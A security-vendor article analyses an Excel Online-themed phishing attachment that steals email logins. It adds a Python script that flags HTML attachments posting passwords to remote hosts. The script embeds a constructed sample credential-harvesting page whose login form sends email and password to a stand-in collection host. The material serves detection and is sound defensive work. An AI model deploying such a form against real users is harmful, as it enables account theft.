Attackers are targeting company employees' login data.
The Locky ransomware case was not the first time that attacks have been carried out via email. According to Eleven, 54 billion spam messages are sent worldwide every day. These range from indiscriminate mass mailings to highly targeted attacks. The current case is a scam aimed primarily at companies, and the technique is new: recipients can only tell that the email is fraudulent if they look very carefully. G DATA security solutions detect the attachment as Script.Trojan-Stealer.Phish.AG. The security experts at G DATA SecurityLabs have analysed the new scam in their latest blog entry.
The email that arrives in potential victims' inboxes claims to be an order and carries an attachment called purchase-order.htm. There are clues in the email itself that point to a scam: no company exists under the given name, the sender address is forged, and the text contains spelling mistakes. If the attackers gain access to an email account, whether it belongs to a private individual or to a company, they can use it to send further spam. If company login data leaks, the consequences can be far more serious, such as unauthorised access to internal company data and email.
The attachment imitates a Microsoft Excel Online document. An Excel spreadsheet appears to be visible in the background, but it is only an image, not a spreadsheet that can be edited, and it is loaded from a server located in Hong Kong. The recipient is asked to enter their email address and password into a login form in order to start the download. After clicking on "Download", the credentials entered are sent to the same Hong Kong server from which the images were loaded, although to a different domain name. This suggests that the attackers control the entire server rather than a single compromised site on it. Once the data has been sent, a web page containing an error message is displayed, so the victim has no indication that their login data has just been stolen.
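The pattern described above (a self-contained .htm attachment whose only "content" is remote images and a login form that posts the password to an outside host) can be checked for statically before the attachment is ever opened. The following is an added example, not G DATA's detection code or the original sample: it parses the attachment with the Python standard library, collects every form and image, and flags any form that carries a password field and posts to a remote host. The sample attachment and all host names in it are constructed for the example (they use the reserved .invalid top-level domain) and do not reproduce the real campaign's infrastructure.

```python
"""Static triage of an HTML e-mail attachment for credential-harvesting forms.

Added example (not G DATA's code). Uses only the standard library, so it can
run offline on a quarantined attachment without fetching any remote resource.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collects every <form> with its input fields, and the src of every <img>."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: action, method, fields
        self.images = []       # src attribute of every <img>
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._open_form = {
                "action": a.get("action", ""),
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._open_form)
        elif tag == "input" and self._open_form is not None:
            self._open_form["fields"].append(
                {"type": (a.get("type") or "text").lower(), "name": a.get("name", "")}
            )
        elif tag == "img":
            self.images.append(a.get("src", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def _host(url):
    """Hostname of an absolute URL; '' for relative references and data: URIs."""
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def analyse_attachment(html_text):
    """Return a triage record: remote image hosts, password forms and a verdict."""
    parser = _FormCollector()
    parser.feed(html_text)
    parser.close()

    remote_image_hosts = sorted({_host(src) for src in parser.images if _host(src)})

    credential_forms = []
    for form in parser.forms:
        if "password" not in {f["type"] for f in form["fields"]}:
            continue  # not a login form
        credential_forms.append({
            "action_host": _host(form["action"]),
            "method": form["method"],
            "fields": [f["name"] for f in form["fields"] if f["type"] != "submit"],
        })

    # An attachment opened from disk has no legitimate reason to send a
    # password to any remote host, so a remote action alone decides the verdict.
    phish = any(cf["action_host"] for cf in credential_forms)
    return {
        "remote_image_hosts": remote_image_hosts,
        "credential_forms": credential_forms,
        "verdict": "credential phish" if phish else "no remote credential form",
    }


# Constructed sample mimicking the layout the article describes: a remotely
# loaded "spreadsheet" image and a login form posting to a different domain.
# Host names are fictitious (.invalid TLD), not the real campaign's servers.
SAMPLE_ATTACHMENT = """<!DOCTYPE html>
<html><head><title>Excel Online</title></head>
<body>
<img src="http://img.example.invalid/sheet-background.png" alt="">
<div class="dialog">
  <p>Sign in to view and download the document.</p>
  <form action="http://collect.example.invalid/submit.php" method="post">
    <input type="email" name="email" placeholder="E-mail">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" value="Download">
  </form>
</div>
</body></html>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(analyse_attachment(SAMPLE_ATTACHMENT), indent=2))
```

The check deliberately compares host names only and performs no DNS lookups; confirming that the image host and the form's action host resolve to the same server, as the G DATA analysts observed, would require resolving both names, which a triage script run on a quarantined attachment should not do automatically. Images referenced from CSS `background:` rules rather than `<img>` tags are not collected by this parser.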
For more information, see the G DATA SecurityBlog.